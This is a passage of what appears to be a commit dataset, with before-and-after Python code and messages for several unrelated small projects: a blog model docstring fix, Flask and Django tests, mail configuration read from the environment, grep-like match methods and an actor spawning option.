<commit_before>"""Collection of Models used in blogsite."""
from . import db
class Post(db.Model):
"""Model representing a blog post.
Attributes
----------
id : db.Column
Autogenerated primary key
title : db.Column
body : db.Column
"""
# Columns
id = db.Column(db.Integer, primary_key=True, autoincrement=True)
title = db.Column(db.String(128))
body = db.Column(db.String(4096))
def __init__(self, title, body):
"""Constructor for Post.
Parameters
----------
title : String
Title/Summary of post
body : String
Contents
"""
self.title = title
self.body = body
def __repr__(self):
"""Representation."""
return '<Post %r:%r>' % self.id, self.title
<commit_msg>Correct type comment for table columns<commit_after>
|
"""Collection of Models used in blogsite."""
from . import db
class Post(db.Model):
"""Model representing a blog post.
Attributes
----------
id : SQLAlchemy.Column
Autogenerated primary key
title : SQLAlchemy.Column
body : SQLAlchemy.Column
"""
# Columns
id = db.Column(db.Integer, primary_key=True, autoincrement=True)
title = db.Column(db.String(128))
body = db.Column(db.String(4096))
def __init__(self, title, body):
"""Constructor for Post.
Parameters
----------
title : String
Title/Summary of post
body : String
Contents
"""
self.title = title
self.body = body
def __repr__(self):
"""Representation."""
return '<Post %r:%r>' % self.id, self.title
|
"""Collection of Models used in blogsite."""
from . import db
class Post(db.Model):
"""Model representing a blog post.
Attributes
----------
id : db.Column
Autogenerated primary key
title : db.Column
body : db.Column
"""
# Columns
id = db.Column(db.Integer, primary_key=True, autoincrement=True)
title = db.Column(db.String(128))
body = db.Column(db.String(4096))
def __init__(self, title, body):
"""Constructor for Post.
Parameters
----------
title : String
Title/Summary of post
body : String
Contents
"""
self.title = title
self.body = body
def __repr__(self):
"""Representation."""
return '<Post %r:%r>' % self.id, self.title
Correct type comment for table columns"""Collection of Models used in blogsite."""
from . import db
class Post(db.Model):
"""Model representing a blog post.
Attributes
----------
id : SQLAlchemy.Column
Autogenerated primary key
title : SQLAlchemy.Column
body : SQLAlchemy.Column
"""
# Columns
id = db.Column(db.Integer, primary_key=True, autoincrement=True)
title = db.Column(db.String(128))
body = db.Column(db.String(4096))
def __init__(self, title, body):
"""Constructor for Post.
Parameters
----------
title : String
Title/Summary of post
body : String
Contents
"""
self.title = title
self.body = body
def __repr__(self):
"""Representation."""
return '<Post %r:%r>' % self.id, self.title
|
<commit_before>"""Collection of Models used in blogsite."""
from . import db
class Post(db.Model):
"""Model representing a blog post.
Attributes
----------
id : db.Column
Autogenerated primary key
title : db.Column
body : db.Column
"""
# Columns
id = db.Column(db.Integer, primary_key=True, autoincrement=True)
title = db.Column(db.String(128))
body = db.Column(db.String(4096))
def __init__(self, title, body):
"""Constructor for Post.
Parameters
----------
title : String
Title/Summary of post
body : String
Contents
"""
self.title = title
self.body = body
def __repr__(self):
"""Representation."""
return '<Post %r:%r>' % self.id, self.title
<commit_msg>Correct type comment for table columns<commit_after>"""Collection of Models used in blogsite."""
from . import db
class Post(db.Model):
"""Model representing a blog post.
Attributes
----------
id : SQLAlchemy.Column
Autogenerated primary key
title : SQLAlchemy.Column
body : SQLAlchemy.Column
"""
# Columns
id = db.Column(db.Integer, primary_key=True, autoincrement=True)
title = db.Column(db.String(128))
body = db.Column(db.String(4096))
def __init__(self, title, body):
"""Constructor for Post.
Parameters
----------
title : String
Title/Summary of post
body : String
Contents
"""
self.title = title
self.body = body
def __repr__(self):
"""Representation."""
return '<Post %r:%r>' % self.id, self.title
|
0cda764617dcbf52c36d4a63e240b6f849b06640
|
tests/app/test_application.py
|
tests/app/test_application.py
|
from .helpers import BaseApplicationTest
class TestApplication(BaseApplicationTest):
def test_index(self):
response = self.client.get('/')
assert 200 == response.status_code
|
from .helpers import BaseApplicationTest
class TestApplication(BaseApplicationTest):
def test_index(self):
response = self.client.get('/')
assert 200 == response.status_code
def test_404(self):
response = self.client.get('/not-found')
assert 404 == response.status_code
|
Add test for not found URLs
|
Add test for not found URLs
|
Python
|
mit
|
alphagov/digitalmarketplace-admin-frontend,alphagov/digitalmarketplace-admin-frontend,mtekel/digitalmarketplace-admin-frontend,mtekel/digitalmarketplace-admin-frontend,alphagov/digitalmarketplace-admin-frontend,mtekel/digitalmarketplace-admin-frontend,mtekel/digitalmarketplace-admin-frontend,alphagov/digitalmarketplace-admin-frontend
|
from .helpers import BaseApplicationTest
class TestApplication(BaseApplicationTest):
def test_index(self):
response = self.client.get('/')
assert 200 == response.status_code
Add test for not found URLs
|
from .helpers import BaseApplicationTest
class TestApplication(BaseApplicationTest):
def test_index(self):
response = self.client.get('/')
assert 200 == response.status_code
def test_404(self):
response = self.client.get('/not-found')
assert 404 == response.status_code
|
<commit_before>from .helpers import BaseApplicationTest
class TestApplication(BaseApplicationTest):
def test_index(self):
response = self.client.get('/')
assert 200 == response.status_code
<commit_msg>Add test for not found URLs<commit_after>
|
from .helpers import BaseApplicationTest
class TestApplication(BaseApplicationTest):
def test_index(self):
response = self.client.get('/')
assert 200 == response.status_code
def test_404(self):
response = self.client.get('/not-found')
assert 404 == response.status_code
|
from .helpers import BaseApplicationTest
class TestApplication(BaseApplicationTest):
def test_index(self):
response = self.client.get('/')
assert 200 == response.status_code
Add test for not found URLsfrom .helpers import BaseApplicationTest
class TestApplication(BaseApplicationTest):
def test_index(self):
response = self.client.get('/')
assert 200 == response.status_code
def test_404(self):
response = self.client.get('/not-found')
assert 404 == response.status_code
|
<commit_before>from .helpers import BaseApplicationTest
class TestApplication(BaseApplicationTest):
def test_index(self):
response = self.client.get('/')
assert 200 == response.status_code
<commit_msg>Add test for not found URLs<commit_after>from .helpers import BaseApplicationTest
class TestApplication(BaseApplicationTest):
def test_index(self):
response = self.client.get('/')
assert 200 == response.status_code
def test_404(self):
response = self.client.get('/not-found')
assert 404 == response.status_code
|
18cd9a1db083db1ce0822bab2f502357eeec97b5
|
blog/tests/test_templatetags.py
|
blog/tests/test_templatetags.py
|
from django.test import TestCase
from django.template import Context, Template
class BlogTemplatetagsTestCase(TestCase):
def test_md_as_html5(self):
body = """# H1 heading
**Paragraph** text
## H2 heading
~~~~{.python}
if True:
print("Some Python code in markdown")
~~~~
1 First
2. Second
* sub
3. Last"""
expected = """<h1>H1 heading</h1>
<p><strong>Paragraph</strong> text</p>
<h2>H2 heading</h2>
<pre><code class="python">if True:
print("Some Python code in markdown")
</code></pre>
<p>1 First
2. Second
* sub
3. Last</p>"""
out = Template(
"{% load markdown %}"
"{{ body|md_as_html5 }}"
).render(Context({'body': body}))
self.assertEqual(out, expected)
|
from django.test import TestCase
from django.template import Context, Template
class BlogTemplatetagsTestCase(TestCase):
def test_md_as_html5(self):
body = """# H1 heading
**Paragraph** text
<strong>html markup works</strong>
## H2 heading
~~~~{.python}
if True:
print("Some <b>Python</b> code in markdown")
~~~~
1 First
2. Second
* sub
3. Last"""
expected = """<h1>H1 heading</h1>
<p><strong>Paragraph</strong> text
<strong>html markup works</strong></p>
<h2>H2 heading</h2>
<pre><code class="python">if True:
print("Some <b>Python</b> code in markdown")
</code></pre>
<p>1 First
2. Second
* sub
3. Last</p>"""
out = Template(
"{% load markdown %}"
"{{ body|md_as_html5 }}"
).render(Context({'body': body}))
self.assertEqual(out, expected)
|
Test HTML handling in markdown
|
Test HTML handling in markdown
|
Python
|
agpl-3.0
|
node13h/droll,node13h/droll
|
from django.test import TestCase
from django.template import Context, Template
class BlogTemplatetagsTestCase(TestCase):
def test_md_as_html5(self):
body = """# H1 heading
**Paragraph** text
## H2 heading
~~~~{.python}
if True:
print("Some Python code in markdown")
~~~~
1 First
2. Second
* sub
3. Last"""
expected = """<h1>H1 heading</h1>
<p><strong>Paragraph</strong> text</p>
<h2>H2 heading</h2>
<pre><code class="python">if True:
print("Some Python code in markdown")
</code></pre>
<p>1 First
2. Second
* sub
3. Last</p>"""
out = Template(
"{% load markdown %}"
"{{ body|md_as_html5 }}"
).render(Context({'body': body}))
self.assertEqual(out, expected)
Test HTML handling in markdown
|
from django.test import TestCase
from django.template import Context, Template
class BlogTemplatetagsTestCase(TestCase):
def test_md_as_html5(self):
body = """# H1 heading
**Paragraph** text
<strong>html markup works</strong>
## H2 heading
~~~~{.python}
if True:
print("Some <b>Python</b> code in markdown")
~~~~
1 First
2. Second
* sub
3. Last"""
expected = """<h1>H1 heading</h1>
<p><strong>Paragraph</strong> text
<strong>html markup works</strong></p>
<h2>H2 heading</h2>
<pre><code class="python">if True:
print("Some <b>Python</b> code in markdown")
</code></pre>
<p>1 First
2. Second
* sub
3. Last</p>"""
out = Template(
"{% load markdown %}"
"{{ body|md_as_html5 }}"
).render(Context({'body': body}))
self.assertEqual(out, expected)
|
<commit_before>from django.test import TestCase
from django.template import Context, Template
class BlogTemplatetagsTestCase(TestCase):
def test_md_as_html5(self):
body = """# H1 heading
**Paragraph** text
## H2 heading
~~~~{.python}
if True:
print("Some Python code in markdown")
~~~~
1 First
2. Second
* sub
3. Last"""
expected = """<h1>H1 heading</h1>
<p><strong>Paragraph</strong> text</p>
<h2>H2 heading</h2>
<pre><code class="python">if True:
print("Some Python code in markdown")
</code></pre>
<p>1 First
2. Second
* sub
3. Last</p>"""
out = Template(
"{% load markdown %}"
"{{ body|md_as_html5 }}"
).render(Context({'body': body}))
self.assertEqual(out, expected)
<commit_msg>Test HTML handling in markdown<commit_after>
|
from django.test import TestCase
from django.template import Context, Template
class BlogTemplatetagsTestCase(TestCase):
def test_md_as_html5(self):
body = """# H1 heading
**Paragraph** text
<strong>html markup works</strong>
## H2 heading
~~~~{.python}
if True:
print("Some <b>Python</b> code in markdown")
~~~~
1 First
2. Second
* sub
3. Last"""
expected = """<h1>H1 heading</h1>
<p><strong>Paragraph</strong> text
<strong>html markup works</strong></p>
<h2>H2 heading</h2>
<pre><code class="python">if True:
print("Some <b>Python</b> code in markdown")
</code></pre>
<p>1 First
2. Second
* sub
3. Last</p>"""
out = Template(
"{% load markdown %}"
"{{ body|md_as_html5 }}"
).render(Context({'body': body}))
self.assertEqual(out, expected)
|
from django.test import TestCase
from django.template import Context, Template
class BlogTemplatetagsTestCase(TestCase):
def test_md_as_html5(self):
body = """# H1 heading
**Paragraph** text
## H2 heading
~~~~{.python}
if True:
print("Some Python code in markdown")
~~~~
1 First
2. Second
* sub
3. Last"""
expected = """<h1>H1 heading</h1>
<p><strong>Paragraph</strong> text</p>
<h2>H2 heading</h2>
<pre><code class="python">if True:
print("Some Python code in markdown")
</code></pre>
<p>1 First
2. Second
* sub
3. Last</p>"""
out = Template(
"{% load markdown %}"
"{{ body|md_as_html5 }}"
).render(Context({'body': body}))
self.assertEqual(out, expected)
Test HTML handling in markdownfrom django.test import TestCase
from django.template import Context, Template
class BlogTemplatetagsTestCase(TestCase):
def test_md_as_html5(self):
body = """# H1 heading
**Paragraph** text
<strong>html markup works</strong>
## H2 heading
~~~~{.python}
if True:
print("Some <b>Python</b> code in markdown")
~~~~
1 First
2. Second
* sub
3. Last"""
expected = """<h1>H1 heading</h1>
<p><strong>Paragraph</strong> text
<strong>html markup works</strong></p>
<h2>H2 heading</h2>
<pre><code class="python">if True:
print("Some <b>Python</b> code in markdown")
</code></pre>
<p>1 First
2. Second
* sub
3. Last</p>"""
out = Template(
"{% load markdown %}"
"{{ body|md_as_html5 }}"
).render(Context({'body': body}))
self.assertEqual(out, expected)
|
<commit_before>from django.test import TestCase
from django.template import Context, Template
class BlogTemplatetagsTestCase(TestCase):
def test_md_as_html5(self):
body = """# H1 heading
**Paragraph** text
## H2 heading
~~~~{.python}
if True:
print("Some Python code in markdown")
~~~~
1 First
2. Second
* sub
3. Last"""
expected = """<h1>H1 heading</h1>
<p><strong>Paragraph</strong> text</p>
<h2>H2 heading</h2>
<pre><code class="python">if True:
print("Some Python code in markdown")
</code></pre>
<p>1 First
2. Second
* sub
3. Last</p>"""
out = Template(
"{% load markdown %}"
"{{ body|md_as_html5 }}"
).render(Context({'body': body}))
self.assertEqual(out, expected)
<commit_msg>Test HTML handling in markdown<commit_after>from django.test import TestCase
from django.template import Context, Template
class BlogTemplatetagsTestCase(TestCase):
def test_md_as_html5(self):
body = """# H1 heading
**Paragraph** text
<strong>html markup works</strong>
## H2 heading
~~~~{.python}
if True:
print("Some <b>Python</b> code in markdown")
~~~~
1 First
2. Second
* sub
3. Last"""
expected = """<h1>H1 heading</h1>
<p><strong>Paragraph</strong> text
<strong>html markup works</strong></p>
<h2>H2 heading</h2>
<pre><code class="python">if True:
print("Some <b>Python</b> code in markdown")
</code></pre>
<p>1 First
2. Second
* sub
3. Last</p>"""
out = Template(
"{% load markdown %}"
"{{ body|md_as_html5 }}"
).render(Context({'body': body}))
self.assertEqual(out, expected)
|
726370913332fd5e27bb04446b75ef59fb711a9c
|
broadgauge/main.py
|
broadgauge/main.py
|
import os
import sys
import web
import yaml
from . import default_settings
def load_default_config():
# take all vars defined in default_config
config = dict((k, v) for k, v in default_settings.__dict__.items()
if not k.startswith("_"))
web.config.update(config)
def load_config_from_env():
keys = [
'SITE_TITLE',
'GITHUB_CLIENT_ID',
'GITHUB_CLIENT_SECRET',
'SECRET_KEY',
'DATABASE_URL',
'ADMIN_USER',
]
for k in keys:
if k in os.environ:
web.config[k.lower()] = os.environ[k]
load_default_config()
load_config_from_env()
from . import webapp
application = webapp.app.wsgifunc()
# Heroku doesn't handle static files, use StaticMiddleware.
application = web.httpserver.StaticMiddleware(application)
def load_config_from_file(configfile):
web.config.update(yaml.load(open(configfile)))
def main():
if "--config" in sys.argv:
index = sys.argv.index("--config")
configfile = sys.argv[index+1]
sys.argv = sys.argv[:index] + sys.argv[index+2:]
load_config_from_file(configfile)
webapp.app.run()
if __name__ == '__main__':
main()
|
import os
import sys
import web
import yaml
from . import default_settings
def load_default_config():
# take all vars defined in default_config
config = dict((k, v) for k, v in default_settings.__dict__.items()
if not k.startswith("_"))
web.config.update(config)
def load_config_from_env():
keys = [
'SITE_TITLE',
'GITHUB_CLIENT_ID',
'GITHUB_CLIENT_SECRET',
'SECRET_KEY',
'DATABASE_URL',
'ADMIN_USER',
'MAIL_SERVER',
'MAIL_USERNAME',
'MAIL_PASSWORD',
'MAIL_TLS',
'FROM_ADDRESS',
]
for k in keys:
if k in os.environ:
web.config[k.lower()] = os.environ[k]
load_default_config()
load_config_from_env()
from . import webapp
application = webapp.app.wsgifunc()
# Heroku doesn't handle static files, use StaticMiddleware.
application = web.httpserver.StaticMiddleware(application)
def load_config_from_file(configfile):
web.config.update(yaml.load(open(configfile)))
def main():
if "--config" in sys.argv:
index = sys.argv.index("--config")
configfile = sys.argv[index+1]
sys.argv = sys.argv[:index] + sys.argv[index+2:]
load_config_from_file(configfile)
webapp.app.run()
if __name__ == '__main__':
main()
|
Read mail settings from config.
|
Read mail settings from config.
|
Python
|
bsd-3-clause
|
fsmk/fsmkschool,anandology/broadgauge
|
import os
import sys
import web
import yaml
from . import default_settings
def load_default_config():
# take all vars defined in default_config
config = dict((k, v) for k, v in default_settings.__dict__.items()
if not k.startswith("_"))
web.config.update(config)
def load_config_from_env():
keys = [
'SITE_TITLE',
'GITHUB_CLIENT_ID',
'GITHUB_CLIENT_SECRET',
'SECRET_KEY',
'DATABASE_URL',
'ADMIN_USER',
]
for k in keys:
if k in os.environ:
web.config[k.lower()] = os.environ[k]
load_default_config()
load_config_from_env()
from . import webapp
application = webapp.app.wsgifunc()
# Heroku doesn't handle static files, use StaticMiddleware.
application = web.httpserver.StaticMiddleware(application)
def load_config_from_file(configfile):
web.config.update(yaml.load(open(configfile)))
def main():
if "--config" in sys.argv:
index = sys.argv.index("--config")
configfile = sys.argv[index+1]
sys.argv = sys.argv[:index] + sys.argv[index+2:]
load_config_from_file(configfile)
webapp.app.run()
if __name__ == '__main__':
main()
Read mail settings from config.
|
import os
import sys
import web
import yaml
from . import default_settings
def load_default_config():
# take all vars defined in default_config
config = dict((k, v) for k, v in default_settings.__dict__.items()
if not k.startswith("_"))
web.config.update(config)
def load_config_from_env():
keys = [
'SITE_TITLE',
'GITHUB_CLIENT_ID',
'GITHUB_CLIENT_SECRET',
'SECRET_KEY',
'DATABASE_URL',
'ADMIN_USER',
'MAIL_SERVER',
'MAIL_USERNAME',
'MAIL_PASSWORD',
'MAIL_TLS',
'FROM_ADDRESS',
]
for k in keys:
if k in os.environ:
web.config[k.lower()] = os.environ[k]
load_default_config()
load_config_from_env()
from . import webapp
application = webapp.app.wsgifunc()
# Heroku doesn't handle static files, use StaticMiddleware.
application = web.httpserver.StaticMiddleware(application)
def load_config_from_file(configfile):
web.config.update(yaml.load(open(configfile)))
def main():
if "--config" in sys.argv:
index = sys.argv.index("--config")
configfile = sys.argv[index+1]
sys.argv = sys.argv[:index] + sys.argv[index+2:]
load_config_from_file(configfile)
webapp.app.run()
if __name__ == '__main__':
main()
|
<commit_before>import os
import sys
import web
import yaml
from . import default_settings
def load_default_config():
# take all vars defined in default_config
config = dict((k, v) for k, v in default_settings.__dict__.items()
if not k.startswith("_"))
web.config.update(config)
def load_config_from_env():
keys = [
'SITE_TITLE',
'GITHUB_CLIENT_ID',
'GITHUB_CLIENT_SECRET',
'SECRET_KEY',
'DATABASE_URL',
'ADMIN_USER',
]
for k in keys:
if k in os.environ:
web.config[k.lower()] = os.environ[k]
load_default_config()
load_config_from_env()
from . import webapp
application = webapp.app.wsgifunc()
# Heroku doesn't handle static files, use StaticMiddleware.
application = web.httpserver.StaticMiddleware(application)
def load_config_from_file(configfile):
web.config.update(yaml.load(open(configfile)))
def main():
if "--config" in sys.argv:
index = sys.argv.index("--config")
configfile = sys.argv[index+1]
sys.argv = sys.argv[:index] + sys.argv[index+2:]
load_config_from_file(configfile)
webapp.app.run()
if __name__ == '__main__':
main()
<commit_msg>Read mail settings from config.<commit_after>
|
import os
import sys
import web
import yaml
from . import default_settings
def load_default_config():
# take all vars defined in default_config
config = dict((k, v) for k, v in default_settings.__dict__.items()
if not k.startswith("_"))
web.config.update(config)
def load_config_from_env():
keys = [
'SITE_TITLE',
'GITHUB_CLIENT_ID',
'GITHUB_CLIENT_SECRET',
'SECRET_KEY',
'DATABASE_URL',
'ADMIN_USER',
'MAIL_SERVER',
'MAIL_USERNAME',
'MAIL_PASSWORD',
'MAIL_TLS',
'FROM_ADDRESS',
]
for k in keys:
if k in os.environ:
web.config[k.lower()] = os.environ[k]
load_default_config()
load_config_from_env()
from . import webapp
application = webapp.app.wsgifunc()
# Heroku doesn't handle static files, use StaticMiddleware.
application = web.httpserver.StaticMiddleware(application)
def load_config_from_file(configfile):
web.config.update(yaml.load(open(configfile)))
def main():
if "--config" in sys.argv:
index = sys.argv.index("--config")
configfile = sys.argv[index+1]
sys.argv = sys.argv[:index] + sys.argv[index+2:]
load_config_from_file(configfile)
webapp.app.run()
if __name__ == '__main__':
main()
|
import os
import sys
import web
import yaml
from . import default_settings
def load_default_config():
# take all vars defined in default_config
config = dict((k, v) for k, v in default_settings.__dict__.items()
if not k.startswith("_"))
web.config.update(config)
def load_config_from_env():
keys = [
'SITE_TITLE',
'GITHUB_CLIENT_ID',
'GITHUB_CLIENT_SECRET',
'SECRET_KEY',
'DATABASE_URL',
'ADMIN_USER',
]
for k in keys:
if k in os.environ:
web.config[k.lower()] = os.environ[k]
load_default_config()
load_config_from_env()
from . import webapp
application = webapp.app.wsgifunc()
# Heroku doesn't handle static files, use StaticMiddleware.
application = web.httpserver.StaticMiddleware(application)
def load_config_from_file(configfile):
web.config.update(yaml.load(open(configfile)))
def main():
if "--config" in sys.argv:
index = sys.argv.index("--config")
configfile = sys.argv[index+1]
sys.argv = sys.argv[:index] + sys.argv[index+2:]
load_config_from_file(configfile)
webapp.app.run()
if __name__ == '__main__':
main()
Read mail settings from config.import os
import sys
import web
import yaml
from . import default_settings
def load_default_config():
# take all vars defined in default_config
config = dict((k, v) for k, v in default_settings.__dict__.items()
if not k.startswith("_"))
web.config.update(config)
def load_config_from_env():
keys = [
'SITE_TITLE',
'GITHUB_CLIENT_ID',
'GITHUB_CLIENT_SECRET',
'SECRET_KEY',
'DATABASE_URL',
'ADMIN_USER',
'MAIL_SERVER',
'MAIL_USERNAME',
'MAIL_PASSWORD',
'MAIL_TLS',
'FROM_ADDRESS',
]
for k in keys:
if k in os.environ:
web.config[k.lower()] = os.environ[k]
load_default_config()
load_config_from_env()
from . import webapp
application = webapp.app.wsgifunc()
# Heroku doesn't handle static files, use StaticMiddleware.
application = web.httpserver.StaticMiddleware(application)
def load_config_from_file(configfile):
web.config.update(yaml.load(open(configfile)))
def main():
if "--config" in sys.argv:
index = sys.argv.index("--config")
configfile = sys.argv[index+1]
sys.argv = sys.argv[:index] + sys.argv[index+2:]
load_config_from_file(configfile)
webapp.app.run()
if __name__ == '__main__':
main()
|
<commit_before>import os
import sys
import web
import yaml
from . import default_settings
def load_default_config():
# take all vars defined in default_config
config = dict((k, v) for k, v in default_settings.__dict__.items()
if not k.startswith("_"))
web.config.update(config)
def load_config_from_env():
keys = [
'SITE_TITLE',
'GITHUB_CLIENT_ID',
'GITHUB_CLIENT_SECRET',
'SECRET_KEY',
'DATABASE_URL',
'ADMIN_USER',
]
for k in keys:
if k in os.environ:
web.config[k.lower()] = os.environ[k]
load_default_config()
load_config_from_env()
from . import webapp
application = webapp.app.wsgifunc()
# Heroku doesn't handle static files, use StaticMiddleware.
application = web.httpserver.StaticMiddleware(application)
def load_config_from_file(configfile):
web.config.update(yaml.load(open(configfile)))
def main():
if "--config" in sys.argv:
index = sys.argv.index("--config")
configfile = sys.argv[index+1]
sys.argv = sys.argv[:index] + sys.argv[index+2:]
load_config_from_file(configfile)
webapp.app.run()
if __name__ == '__main__':
main()
<commit_msg>Read mail settings from config.<commit_after>import os
import sys
import web
import yaml
from . import default_settings
def load_default_config():
# take all vars defined in default_config
config = dict((k, v) for k, v in default_settings.__dict__.items()
if not k.startswith("_"))
web.config.update(config)
def load_config_from_env():
keys = [
'SITE_TITLE',
'GITHUB_CLIENT_ID',
'GITHUB_CLIENT_SECRET',
'SECRET_KEY',
'DATABASE_URL',
'ADMIN_USER',
'MAIL_SERVER',
'MAIL_USERNAME',
'MAIL_PASSWORD',
'MAIL_TLS',
'FROM_ADDRESS',
]
for k in keys:
if k in os.environ:
web.config[k.lower()] = os.environ[k]
load_default_config()
load_config_from_env()
from . import webapp
application = webapp.app.wsgifunc()
# Heroku doesn't handle static files, use StaticMiddleware.
application = web.httpserver.StaticMiddleware(application)
def load_config_from_file(configfile):
web.config.update(yaml.load(open(configfile)))
def main():
if "--config" in sys.argv:
index = sys.argv.index("--config")
configfile = sys.argv[index+1]
sys.argv = sys.argv[:index] + sys.argv[index+2:]
load_config_from_file(configfile)
webapp.app.run()
if __name__ == '__main__':
main()
|
4a32838db7cbfa1962f3cd61f46caa308e4ea645
|
src/rgrep.py
|
src/rgrep.py
|
def display_usage():
return 'Usage: python rgrep [options] pattern files\nThe options are the '\
'same as grep\n'
def rgrep(pattern='', text='', case='', count=False, version=False):
if pattern == '' or text == '':
return display_usage()
elif not count:
if case == 'i':
pattern = pattern.lower()
text = text.lower()
return pattern in text
class RGrep(object):
def __init__(self):
self.version = 'RGrep (BSD) 0.0.1'
self.count = False
self.pattern = ''
self.text = ''
self.case = ''
def get_version(self):
return self.version
def get_count(self):
count = 0
text = self.text.split('\n')
for line in text:
if self.pattern in line:
count += 1
return count
|
def display_usage():
return 'Usage: python rgrep [options] pattern files\nThe options are the '\
'same as grep\n'
class RGrep(object):
def __init__(self):
self.version = 'RGrep (BSD) 0.0.1'
self.count = False
self.pattern = ''
self.text = ''
self.case = ''
def get_version(self):
return self.version
def get_count(self):
count = 0
text = self.text.split('\n')
for line in text:
if self.pattern in line:
count += 1
return count
def get_match(self):
return self.pattern in self.text
def get_match_case_insensitive(self):
self.pattern = self.pattern.lower()
self.text = self.text.lower()
return self.get_match()
|
Add match and case insensitive methods
|
Add match and case insensitive methods
|
Python
|
bsd-2-clause
|
ambidextrousTx/RGrep-Python
|
def display_usage():
return 'Usage: python rgrep [options] pattern files\nThe options are the '\
'same as grep\n'
def rgrep(pattern='', text='', case='', count=False, version=False):
if pattern == '' or text == '':
return display_usage()
elif not count:
if case == 'i':
pattern = pattern.lower()
text = text.lower()
return pattern in text
class RGrep(object):
def __init__(self):
self.version = 'RGrep (BSD) 0.0.1'
self.count = False
self.pattern = ''
self.text = ''
self.case = ''
def get_version(self):
return self.version
def get_count(self):
count = 0
text = self.text.split('\n')
for line in text:
if self.pattern in line:
count += 1
return count
Add match and case insensitive methods
|
def display_usage():
return 'Usage: python rgrep [options] pattern files\nThe options are the '\
'same as grep\n'
class RGrep(object):
def __init__(self):
self.version = 'RGrep (BSD) 0.0.1'
self.count = False
self.pattern = ''
self.text = ''
self.case = ''
def get_version(self):
return self.version
def get_count(self):
count = 0
text = self.text.split('\n')
for line in text:
if self.pattern in line:
count += 1
return count
def get_match(self):
return self.pattern in self.text
def get_match_case_insensitive(self):
self.pattern = self.pattern.lower()
self.text = self.text.lower()
return self.get_match()
|
<commit_before>def display_usage():
return 'Usage: python rgrep [options] pattern files\nThe options are the '\
'same as grep\n'
def rgrep(pattern='', text='', case='', count=False, version=False):
if pattern == '' or text == '':
return display_usage()
elif not count:
if case == 'i':
pattern = pattern.lower()
text = text.lower()
return pattern in text
class RGrep(object):
def __init__(self):
self.version = 'RGrep (BSD) 0.0.1'
self.count = False
self.pattern = ''
self.text = ''
self.case = ''
def get_version(self):
return self.version
def get_count(self):
count = 0
text = self.text.split('\n')
for line in text:
if self.pattern in line:
count += 1
return count
<commit_msg>Add match and case insensitive methods<commit_after>
|
def display_usage():
return 'Usage: python rgrep [options] pattern files\nThe options are the '\
'same as grep\n'
class RGrep(object):
def __init__(self):
self.version = 'RGrep (BSD) 0.0.1'
self.count = False
self.pattern = ''
self.text = ''
self.case = ''
def get_version(self):
return self.version
def get_count(self):
count = 0
text = self.text.split('\n')
for line in text:
if self.pattern in line:
count += 1
return count
def get_match(self):
return self.pattern in self.text
def get_match_case_insensitive(self):
self.pattern = self.pattern.lower()
self.text = self.text.lower()
return self.get_match()
|
def display_usage():
return 'Usage: python rgrep [options] pattern files\nThe options are the '\
'same as grep\n'
def rgrep(pattern='', text='', case='', count=False, version=False):
if pattern == '' or text == '':
return display_usage()
elif not count:
if case == 'i':
pattern = pattern.lower()
text = text.lower()
return pattern in text
class RGrep(object):
def __init__(self):
self.version = 'RGrep (BSD) 0.0.1'
self.count = False
self.pattern = ''
self.text = ''
self.case = ''
def get_version(self):
return self.version
def get_count(self):
count = 0
text = self.text.split('\n')
for line in text:
if self.pattern in line:
count += 1
return count
Add match and case insensitive methodsdef display_usage():
return 'Usage: python rgrep [options] pattern files\nThe options are the '\
'same as grep\n'
class RGrep(object):
def __init__(self):
self.version = 'RGrep (BSD) 0.0.1'
self.count = False
self.pattern = ''
self.text = ''
self.case = ''
def get_version(self):
return self.version
def get_count(self):
count = 0
text = self.text.split('\n')
for line in text:
if self.pattern in line:
count += 1
return count
def get_match(self):
return self.pattern in self.text
def get_match_case_insensitive(self):
self.pattern = self.pattern.lower()
self.text = self.text.lower()
return self.get_match()
|
<commit_before>def display_usage():
return 'Usage: python rgrep [options] pattern files\nThe options are the '\
'same as grep\n'
def rgrep(pattern='', text='', case='', count=False, version=False):
if pattern == '' or text == '':
return display_usage()
elif not count:
if case == 'i':
pattern = pattern.lower()
text = text.lower()
return pattern in text
class RGrep(object):
def __init__(self):
self.version = 'RGrep (BSD) 0.0.1'
self.count = False
self.pattern = ''
self.text = ''
self.case = ''
def get_version(self):
return self.version
def get_count(self):
count = 0
text = self.text.split('\n')
for line in text:
if self.pattern in line:
count += 1
return count
<commit_msg>Add match and case insensitive methods<commit_after>def display_usage():
return 'Usage: python rgrep [options] pattern files\nThe options are the '\
'same as grep\n'
class RGrep(object):
def __init__(self):
self.version = 'RGrep (BSD) 0.0.1'
self.count = False
self.pattern = ''
self.text = ''
self.case = ''
def get_version(self):
return self.version
def get_count(self):
count = 0
text = self.text.split('\n')
for line in text:
if self.pattern in line:
count += 1
return count
def get_match(self):
return self.pattern in self.text
def get_match_case_insensitive(self):
self.pattern = self.pattern.lower()
self.text = self.text.lower()
return self.get_match()
|
bd8c5628a6af96a68f1ed6022a983af7a5495529
|
tartpy/rt.py
|
tartpy/rt.py
|
import os
import multiprocessing
import threading
class Sponsor(object):
def __init__(self):
print('Sponsor pid: {}'.format(os.getpid()))
def create(self, behavior):
return Actor(behavior, self)
class Actor(object):
def __init__(self, behavior, sponsor):
self.behavior = behavior
self.sponsor = sponsor
def send(self, message):
spawn(self.behavior, message, method='process')
def spawn(f, args, method='thread'):
if method == 'thread':
t = threading.Thread(target=f, args=(args,))
t.start()
if method == 'process':
p = multiprocessing.Process(target=f, args=(args,))
p.start()
sponsor = Sponsor()
def stateless_beh(message):
print("Got message: {}".format(message))
stateless = sponsor.create(stateless_beh)
def stateful_beh(state):
def _f(message):
print("Have state: {}".format(state))
print("Got message: {}".format(message))
return _f
stateful = sponsor.create(stateful_beh({'key': 5}))
|
import os
import multiprocessing
import threading
class Sponsor(object):
def __init__(self):
print('Sponsor pid: {}'.format(os.getpid()))
def create(self, behavior):
return Actor(behavior, self)
class Actor(object):
def __init__(self, behavior, sponsor):
self.behavior = behavior
self.sponsor = sponsor
def send(self, message, method='thread'):
spawn(self.behavior, message, method)
def spawn(f, args, method='thread'):
if method == 'thread':
t = threading.Thread(target=f, args=(args,))
t.start()
if method == 'process':
p = multiprocessing.Process(target=f, args=(args,))
p.start()
sponsor = Sponsor()
def stateless_beh(message):
print("Got message: {}".format(message))
stateless = sponsor.create(stateless_beh)
def stateful_beh(state):
def _f(message):
print("Have state: {}".format(state))
print("Got message: {}".format(message))
return _f
stateful = sponsor.create(stateful_beh({'key': 5}))
|
Allow arg to specify spawning type
|
Allow arg to specify spawning type
|
Python
|
mit
|
waltermoreira/tartpy
|
import os
import multiprocessing
import threading
class Sponsor(object):
def __init__(self):
